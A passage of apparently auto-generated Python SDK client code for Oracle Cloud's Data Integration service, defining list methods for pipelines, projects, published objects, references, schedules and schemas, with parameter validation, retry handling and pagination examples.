"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineValidationSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineValidationSummaryCollection")
def list_pipelines(self, workspace_id, **kwargs):
"""
Retrieves a list of pipelines in a project or folder from within a workspace; the `aggregator_key` query parameter specifies the project or folder.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str aggregator_key: (optional)
Used to filter by the project or the folder object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_pipelines.py.html>`__ to see an example of how to use list_pipelines API.
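A minimal pagination sketch that follows the `opc-next-page` response header (`client` and `workspace_id` are assumed to be set up already):

.. code-block:: python

    page = None
    while True:
        response = client.list_pipelines(workspace_id, limit=50, page=page)
        for pipeline in response.data.items:
            print(pipeline.name)
        page = response.headers.get("opc-next-page")
        if not page:
            break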
"""
resource_path = "/workspaces/{workspaceId}/pipelines"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"aggregator_key",
"fields",
"name",
"identifier",
"limit",
"page",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_pipelines got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"aggregatorKey": kwargs.get("aggregator_key", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PipelineSummaryCollection")
def list_projects(self, workspace_id, **kwargs):
"""
Retrieves a list of projects in a workspace and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting-related parameters are ignored when the `query` parameter is present (a search operation sorts by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ProjectSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_projects.py.html>`__ to see an example of how to use list_projects API.
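A minimal sketch using the SDK's pagination helper to collect every page (`client` and `workspace_id` are assumed to be set up already):

.. code-block:: python

    import oci.pagination

    # Aggregates the items from every page into a single response;
    # response.data is the combined list of project summaries.
    response = oci.pagination.list_call_get_all_results(
        client.list_projects, workspace_id)
    for project in response.data:
        print(project.name)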
"""
resource_path = "/workspaces/{workspaceId}/projects"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_projects got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ProjectSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ProjectSummaryCollection")
def list_published_objects(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of all the published objects for a specified application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the published object.
:param list[str] type: (optional)
Used to filter by the type of the object. The type can be
suffixed with the optional filter operator InSubtree.
For Data Integration APIs, a filter based on the type Task is used.
:param str type_in_subtree: (optional)
Used in association with the type parameter. If the value is true,
all subtypes of the given type parameter are considered.
If the value is false, subtypes are not considered. The default is false.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PublishedObjectSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_published_objects.py.html>`__ to see an example of how to use list_published_objects API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/publishedObjects"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"fields",
"name",
"identifier",
"type",
"type_in_subtree",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_published_objects got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"typeInSubtree": kwargs.get("type_in_subtree", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObjectSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObjectSummaryCollection")
def list_references(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of references in an application. Reference objects are created when data flows and tasks use objects, such as data assets and connections.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str name: (optional)
Used to filter by the name of the object.
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ReferenceSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_references.py.html>`__ to see an example of how to use list_references API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/references"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"limit",
"page",
"name",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_references got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"name": kwargs.get("name", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ReferenceSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ReferenceSummaryCollection")
def list_schedules(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of schedules in the specified application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] type: (optional)
Used to filter by the object type of the object. It can be suffixed with an optional filter operator InSubtree. If this operator is not specified, then exact match is considered. Examples: `?type=DATA_LOADER_TASK&typeInSubtree=false`, `?type=DATA_LOADER_TASK`, and `?type=DATA_LOADER_TASK&typeInSubtree=true` each return all objects of type data loader task.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ScheduleSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_schedules.py.html>`__ to see an example of how to use list_schedules API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"type",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_schedules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ScheduleSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ScheduleSummaryCollection")
def list_schemas(self, workspace_id, connection_key, schema_resource_name, **kwargs):
"""
Retrieves a list of all the schemas that can be accessed using the specified connection.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
Schema resource name used for retrieving schemas.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str name: (optional)
Used to filter by the name of the object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] name_list: (optional)
Used to filter by a list of object names.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.SchemaSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_schemas.py.html>`__ to see an example of how to use list_schemas API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"page",
"limit",
"fields",
"sort_by",
"sort_order",
"name",
"opc_request_id",
"name_list"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_schemas got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"schemaResourceName": schema_resource_name,
"name": kwargs.get("name", missing),
"nameList": self.base_client.generate_collection_format_param(kwargs.get("name_list", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="SchemaSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="SchemaSummaryCollection")
def list_task_run_logs(self, workspace_id, application_key, task_run_key, **kwargs):
"""
Gets log entries for a task run using its key.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.TaskRunLogSummary`
:rtype: :class:`~oci.response.Response`
:example:
